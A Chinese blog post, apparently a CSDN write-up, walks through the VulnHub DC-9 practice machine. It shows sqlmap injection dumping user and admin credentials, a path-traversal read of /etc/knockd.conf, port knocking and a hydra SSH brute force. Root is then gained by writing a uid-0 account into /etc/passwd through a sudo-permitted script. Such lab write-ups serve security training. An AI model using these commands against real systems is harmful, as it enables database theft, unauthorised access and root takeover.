靶场-DC

最新推荐文章于 2024-11-08 16:00:10 发布
最新推荐文章于 2024-11-08 16:00:10 发布
阅读量640 收藏
点赞数
分类专栏: 靶场 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/127956277
版权

文章目录

主机发现

nmap -sP 192.168.111.1/24
arpscan -l
netdiscover -p
发现除了本机ip,速度快

发现目标机的ip:192.168.111.140
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

端口扫描

nmap -sS -v -A -P 1-65535 192.168.111.140

开放了22,80端口
在这里插入图片描述

扫描目录

python dirsearch.py -u 192.168.111.140

在这里插入图片描述
在这里插入图片描述

登录网页

http://192.168.111.140/display.php

看到员工列表
在这里插入图片描述

http://192.168.111.140/manage.php
使用万能密码注入(失败)
‘ or 1=1--+

在这里插入图片描述

查看users库

search之后,就会这个url
http://192.168.111.140/results.php
尝试sqlmap注入(成功)
sqlmap -u "http://192.168.111.140/results.php" --data="search=1"
查看当前库
sqlmap -u "http://192.168.111.140/results.php" --data="search=1" --current-db
查看所有库
sqlmap -u "http://192.168.111.140/results.php" --data="search=1" --dbs
查看表
sqlmap -u "http://192.168.111.140/results.php" --data="search=1" -D users --tables
脱 UserDetails表中所有数据
sqlmap -u "http://192.168.111.140/results.php" --data="search=1" -D users -T UserDetails --dump

要么做成字典爆破,要么一个一个输入
结论,没有正确的密码登录

+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

查看staff库(密码正确)

sqlmap -u "http://192.168.111.140/results.php" --data="search=1" -D Staff --tables
sqlmap -u "http://192.168.111.140/results.php" --data="search=1" -D Staff -T Users --dump

用自带的字典解密hash

+--------+--------------------------------------------------+----------+
| UserID | Password                                         | Username |
+--------+--------------------------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin    |
+--------+--------------------------------------------------+----------+

在这里插入图片描述
在这里插入图片描述
看到file does not exeist,考虑文件包含,不明白为什么考虑文件包含,但是看到了包含出的内容,想清了为什么
在这里插入图片描述

爆破ssh

连接拒绝

hydra -L users -P passwd 192.168.111.140 ssh

有三种情况
1.端口拒绝访问(防火墙)
2.用户被限制登录
3.运行了knockd服务(靶机特有的环境吧,实战不知道有没有)
只能用第三种试一下,文件在/etc/knockd.conf
在这里插入图片描述

http://192.168.111.140/manage.php?file=../../../../../../../etc/knockd.conf

在这里插入图片描述

options是日志文件,当按顺序访问sequence 序列的7000、8000、9000端口时,就会执行/sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCPET 命令
就是在防火墙的INPUT的chain链中接受22端口的TCP连接
seq_timeout=60表示每个端口访问的时间间隔不超过60秒
tcpflags=syn 表示一次只建立一次tcp连接。

端口敲门服务利用

端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

nmap -p 7469 192.168.111.140
nmap -p 8475 192.168.111.140
nmap -p 9842 192.168.111.140
nmap -p 22 192.168.111.140

我单步敲门,打不开22端口,超时
有超时限制,加快命令的输入速度也可以写个python的 for in 循环来访问,如下

for x in 7469 8475 9842;do nmap -p $x 192.168.111.140;done

在这里插入图片描述
再次爆破22端口

hydra -L users -P passwd 192.168.111.140 ssh

在这里插入图片描述
进入ssh需要的操作是

查看用户文件——ls -a
查看root权限——sudo -l
查看历史命令——history

只有janitor用户里面有内容
在这里插入图片描述
加入字典继续爆破(好家伙玩套娃嘞)
发现了一个新用户
发现可以无密码root身份运行test脚本
在这里插入图片描述

提权

查看文件属性

file /opt/devstuff/dist/test/test

在这里插入图片描述
在这里插入图片描述
在文件中查找test.py

find / -name "test.py" 2>/dev/null
find / -name "test.py"
单独使用,会有很多没有权限的文件

在这里插入图片描述
查看文件内容
在这里插入图片描述
序列号从0开始,0是程序本身
该脚本是把第二个文件内容写到第三个文件中去,可以写拥有root权限的账号到passwd文件里,再登陆;前提要生成加密的密码

openssl passwd -1 -salt admin 123456
$1$admin$LClYcRe.ee8dQwgrFc5nz.


echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0:root:/root:/bin/bash' > /tmp/a.txt
sudo /opt/devstuff/dist/test/test /tmp/a.txt /etc/passwd

openssl passwd的作用是用来计算密码hash的,目的是为了防止密码以明文的形式出现。

语法格式: openssl passwd [option] passwd

openssl passwd常用的选项如下:

-1:表示采用的是MD5加密算法。

-salt:指定salt值(加盐),不使用随机产生的salt。在使用加密算法进行加密时,即使密码一样,salt不一样,所计算出来的hash值也不一样,除非密码一样,salt值也一样,计算出来的hash值才一样。salt为8字节的字符串。

示例:

[tom@localhost ~]$ openssl passwd -1 -salt ‘12345678’ ##注意‘12345678’不是密码而是密码的长度

Password: ##这里输入的是密码

$1$12345678$1qWiC4czIc07B4J8bPjfC0 ##这是生成的密文密码


openssl passwd -1 -salt admin 123456
-1 的意思是使用md5加密算法
-salt 自动插入一个随机数作为文件内容加密
admin 123456 用户名和密码

##将生成的密码串,手动添加到/etc/shadow中就可用作用户的登陆密码了。

在这里插入图片描述

空白行
关注
专栏目录
Vulnhub靶场渗透测试系列DC-9(knockd敲门服务)
qq_45722813的博客
12-12 6687
Vulnhub靶场渗透测试系列DC-9 靶机下载地址:https://www.vulnhub.com/entry/dc-9,412/
靶场练习第十九天~vulnhub靶场之GreenOptic: 1
qq_57976347的博客
02-18 834
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:GreenOptic: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -sV 192.168.101.123 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息
vulnhub靶场实战系列(三)之 dc9
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-11 537
发现存在一个目录包含漏洞,我们这里仔细观察发现,这里爆出来的用户名和之前我们数据库跑出来的用户名字居然可以一一对应上,也就是说,我们跑出来的不是网站的用户,而是登录靶机ssh服务的用户,接下来我们就去爆破ssh服务。在使用fuzz爆破前,这里还有一个点要注意,因为我们要爆破的是登录后的页面,所以我们这里首先要获取他的cookie值,再进行爆破。我们发现这里有两个列,一个是username,一个是password,我们先将这两个列单独提取出来,方便后续的渗透使用。面对这样的一个网页,我们应该怎样入手呢?
vulnhub DC9 靶场练习
鸥鹭忘机
09-05 1909
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第9台,也是最后一台。下载地址为https://www.vulnhub.com/entry/dc-9,412/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的难度为中等,其关键点是需要知道knockd服务。建议在挑战该靶机之前了解一下knockd服务。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-9靶机,然后选中配置。依次点击网络配置->NAT模式->
DC系列靶场---DC 5靶场的渗透测试
zhouA0221的博客
08-06 1323
DOS格式的文本文件在Linux底下,用较低版本的vi打开时行尾会显示^M,而且很多命令都无法很好的处理这种格式的文件,如果是个shell脚本,。因此产生了两种格式文件相互转换的需求,对应的将UNIX格式文本文件转成成DOS格式的是unix2dos命令。提交后重定向到thankyou.php的文件中,随着不断刷新,看到页脚的版本在发生改变,这个就是文件包含漏洞啦。服务器执行PHP文件时,可以通过文件包含函数加载另外一个文件(参数),另外一个文件中的PHP代码就会被执行,file=footer.php
DC系列靶场---DC 8靶场的渗透测试
zhouA0221的博客
08-09 1051
Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。nid=3,问号传参,这种URL极有可能存在SQL注入漏洞。初步验证是否有SQL注入漏洞,直接在URL后边加个 ‘ 如果报错那就是被系统执行了,没有进行过滤。5、拿到shell后进行信息收集,Exim这个程序然后搜索这个程序的漏洞。2、通过这个URL加'看看是否报错,如果报错就是被系统执行了,那就是存在。3、拿到用户名和密码之后使用john进行爆破密码,爆出密码后登录到后台。
VulnHub靶场-DC:1
weixin_48972359的博客
04-16 693
靶机:DC:1靶机里有5个flag,并要求获取root权限。
DC系列靶场---DC 9靶场的渗透测试
zhouA0221的博客
08-13 1277
先利用openssl命令创建一个密码,得到hash密码我们切换到tmp目录下,新建一个文件再回到/opt/devstuff/dist/test目录,执行程序test,将xiao的文件内容写入到/etc/passwd文件里面可以看到xiaofeixia用户已经添加到/etc/passwd文件里了,接下来然后使用命令su - xiao切换到我们添加的xiao用户,输入之前设置好密码即可登录。这里我们看到一个password文件,打开之后看到好多个秘密,我把密码放到我们的passwd文件中。
DC系列靶场---DC 2靶场的渗透测试(二)
zhouA0221的博客
07-22 1437
虽然我们现在已经可以执行切换路径命令了,但是发现还有是很多命令不能用。我想看看一下目标主机的所有用户,是不能执行的。那我们就用到了当前shell逃逸。第一种情况:/ 被允许的情况下;直接 /bin/sh 或 /bin/bash第二种情况:能够设置PATH或SHELL时。现在我们是符合第一种情况的所以我们直接使用/bin/sh 或者 /bin/bash现在我们就可以使用cat命令了,当然其他命令我们也是可以进行执行的。
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
【神经科学学习笔记】基于分层嵌套谱分割(Nested Spectral Partition)模型分析大脑网络整合与分离的学习总结
Rose9614的博客
11-06 1352
需要说明的是,本文仅是笔者对NSP方法的初步尝试,主要聚焦于功能连接网络的分析。原文中还包含了结构连接网络的分析,以及功能-结构整合的深入探讨,这些都为理解大脑的组织原理提供了更全面的视角。感兴趣的小伙伴强烈建议去阅读原文~笔者也准备明天有时间再尝试计算一下局部指标。
[vulnhub] DarkHole: 1
weixin_46099552的博客
11-08 884
vulnhub - DarkHole: 1
嵌入式学习-网络高级-Day01
Xiaomo1536的博客
11-06 1109
对于读数据以及写单个来说,在主机询问报文里面报文头中字节长度固定,都是0x0006,(1个字节的单元标识符,1个字节功能码,2个字节的地址,2个字节的数据)输入寄存器,这个和保持寄存器类似,但是也是只支持读而不能写。报文头------功能码-------起始地址-------数量--------字节计数--------数据。报文头(字节长度可能发生变化)------功能码------字节计数-------数据。报文头------功能码-------地址-------数据/断通标志(2个字节)
Latex中给公式加边框
最新发布
Angelaboy的博客
11-08 372
Latex中给公式加边框
第11章 LAMP架构企业实战
lihuhelihu的博客
11-06 1025
随着开源潮流的蓬勃发展,开放源代码的LAMP已经与J2EE和.Net商业软件形成三足鼎立之势,并且该软件开发的项目在软件方面的投资成本较低,因此受到整个IT界的关注。LAMP架构受到大多数中小企业的运维、DBA、程序员的青睐,Apache默认只能发布静态网页,而LAMP组合可以发布静态+PHP动态页面。静态页面通常指不与数据库发生交互的页面,是一种基于w3c规范的一种网页书写格式,是一种统一协议语言,所以称之为静态网页。
DC-1靶场攻防:信息收集与Drupal漏洞挖掘
"DC-1靶场的攻防演练教程" 在网络安全领域,靶场是进行安全测试和技能提升的重要平台。本教程聚焦于名为DC-1的靶机,通过一系列步骤来展示如何找到并利用靶机上的漏洞来获取flag。下面我们将详细探讨这个过程。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值